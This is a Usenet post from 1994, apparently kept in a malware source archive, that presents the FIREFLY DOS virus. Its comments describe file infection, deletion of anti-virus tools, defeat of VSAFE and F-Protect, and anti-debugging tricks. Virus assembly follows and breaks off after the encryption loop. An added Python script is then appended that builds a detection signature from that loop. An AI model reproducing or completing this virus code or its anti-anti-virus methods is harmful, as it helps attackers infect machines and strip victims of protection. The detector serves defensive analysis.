MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.firefly.asm
2021-01-12 17:41:47 -06:00

From netcom.com!ix.netcom.com!howland.reston.ans.net!cs.utexas.edu!geraldo.cc.utexas.edu!axpvms.cc.utexas.edu!HALFLIFE Tue Nov 29 09:56:01 1994
Xref: netcom.com alt.comp.virus:491
Path: netcom.com!ix.netcom.com!howland.reston.ans.net!cs.utexas.edu!geraldo.cc.utexas.edu!axpvms.cc.utexas.edu!HALFLIFE
From: halflife@axpvms.cc.utexas.edu
Newsgroups: alt.comp.virus
Subject: Firefly virus
Date: 28 Nov 1994 08:51:37 GMT
Organization: University of Texas @ Austin
Lines: 61
Message-ID: <3bc5mq$p63@geraldo.cc.utexas.edu>
Reply-To: halflife@axpvms.cc.utexas.edu
NNTP-Posting-Host: axpvms.cc.utexas.edu
;FIREFLY virus, by Nikademus.
;
;Firefly is an encrypted, memory resident virus which infects
;.COM files on load. It incorporates code from Proto-T,
;LokJaw and YB-X viruses and, when in memory, attacks a large selection
;of anti-virus programs as they are executed. Anti-virus programs
;identified by Firefly's execute/load handler are deleted.
;Firefly incorporates simple code from previous issues of the newsletter
;designed to de-install generic VSAFE resident virus activity
;filters designed for Microsoft by Central Point Software. It
;contains instructions - specifically a segment of pseudo-nested
;loops - which spoof F-Protect's expert system generic virus
;identification feature.
;
;FIREFLY also includes a visual marker tied to the system timer
;tick interrupt (1Ch) which slowly cycles the NumLock, CapsLock
;and ScrollLock LEDs on the keyboard. This produces a noticeable
;twinkling effect when the virus is active on a machine.
;
;Anti-anti-virus measures used by Firefly vary in effectiveness
;dependent upon how a user employs software. For example, while
;Firefly is designed to delete the Victor Charlie anti-virus
;shell, VC.EXE, a user who employs the software package's utilities
;for generic virus detection singly will not be interfered with
;by the virus. Your results may vary, but the virus does effectively
;delete anti-virus programs while in memory unless steps are taken
;beforehand to avoid this.
;
;Firefly incorporates minor code armoring techniques designed to thwart
;trivial debugging.
.radix 16
code segment
model small
assume cs:code, ds:code, es:code
org 100h
len equ offset last - start
vir_len equ len / 16d ; 16 bytes per paragraph
encryptlength equ (last - begin)/4+1
start:
mov bx, offset begin ; The Encryption Head
mov cx, encryptlength ;
encryption_loop: ;
db 81h ; XOR WORD PTR [BX], ????h
db 37h ;
encryption_value_1: ;
dw 0000h ;
;
db 81h ; XOR WORD PTR [BX+2], ????h
db 77h ;
db 02h ; 2 different random words
encryption_value_2: ; give 32-bit encryption
dw 0000h ;
add bx, 4 ;
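For detection work, the encryption head above can be matched as a wildcard byte signature. The following is an added example, not part of the original post or listing: the names `HEAD`, `find_heads`, `SAMPLE` and `CLEAN` are hypothetical, the test bytes are constructed, and the `BB`/`B9` opcodes are the standard 8086 encodings of the two `mov` instructions rather than bytes shown on the page.

```python
import re
import struct

# Fixed bytes come from the listing's "db" lines (81 37 / 81 77 02); BB and B9
# are the standard 8086 encodings of MOV BX,imm16 and MOV CX,imm16. The four
# 16-bit operands vary per sample, so they are wildcarded and captured.
HEAD = re.compile(
    rb"\xBB(?P<start>..)"          # mov bx, offset begin
    rb"\xB9(?P<count>..)"          # mov cx, encryptlength
    rb"\x81\x37(?P<key1>..)"       # xor word ptr [bx], key1
    rb"\x81\x77\x02(?P<key2>..)",  # xor word ptr [bx+2], key2
    re.DOTALL,                     # "." must also match byte 0x0A
)
FIELDS = ("start", "count", "key1", "key2")

def find_heads(image: bytes) -> list[dict]:
    """Return one record per match: file offset plus the decoded operands."""
    hits = []
    for m in HEAD.finditer(image):
        rec = {name: struct.unpack("<H", m.group(name))[0] for name in FIELDS}
        rec["offset"] = m.start()
        # A .COM image fits in one 64 KiB segment, so a loop count that would
        # cover more than that (4 bytes per iteration) is a false positive.
        rec["plausible"] = 0 < rec["count"] * 4 <= 0xFFFF
        # Keys of 0000h (the listing's placeholders) make the XOR a no-op.
        rec["null_keys"] = rec["key1"] == 0 and rec["key2"] == 0
        hits.append(rec)
    return hits

# Constructed test inputs, not taken from any real sample.
SAMPLE = bytes.fromhex("909090" "BB1B01" "B94000" "81373412" "817702CDAB" "83C304")
CLEAN = bytes.fromhex("B409BA0801CD21C3") + b"Hello$"

if __name__ == "__main__":
    for name, blob in (("SAMPLE", SAMPLE), ("CLEAN", CLEAN)):
        print(name, find_heads(blob))
```

Seven fixed bytes make a weak signature, so a hit is a triage lead to confirm by disassembly, not a verdict.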